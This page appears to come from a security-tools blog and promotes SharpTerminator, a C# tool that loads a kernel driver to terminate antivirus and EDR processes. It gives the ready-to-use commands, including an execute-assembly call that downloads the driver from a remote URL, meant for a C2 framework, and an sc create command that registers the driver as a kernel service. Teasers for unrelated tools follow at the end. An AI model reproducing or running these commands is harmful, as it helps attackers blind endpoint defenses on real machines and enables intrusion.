C# port of ZeroMemoryEx’s Terminator, so all hail goes to him.
You can download the driver from a remote URL using SharpTerminator and load it to terminate AV/EDR processes, or you can directly load it to the disk to perform the same operation.
When using Remote URL, the driver is downloaded to “C:\Windows\Temp” and then loaded from there.
In fact, there is no difference between them; if you don’t want to use the upload function in your C2, you can use the other one.
Loading from remote url:
execute-assembly SharpTerminator.exe --url "http://remoteurl.com:80/Terminator.sys"
Loading from disk:
execute-assembly SharpTerminator.exe --disk "C:\path\to\driver\Terminator.sys"
If you get “Failed to register the process in the trusted list!” error you should add service manually:
sc create Terminator binPath= "C:\path\to\driver.sys" type= kernel start= demand
Starship is a powerful, minimal, and highly customizable cross-shell prompt designed to enhance the terminal…
Lemmy is an innovative, open-source platform designed for link aggregation and discussion, providing a decentralized…
The latest release of ImHex v1.37.0 introduces a host of exciting features and improvements, enhancing…
Ghauri is a cutting-edge, cross-platform tool designed to automate the detection and exploitation of SQL…
Writing tools have become indispensable for individuals looking to enhance their writing efficiency, accuracy, and…
PatchWerk is a proof-of-concept (PoC) tool designed to clean NTDLL syscall stubs by patching syscall…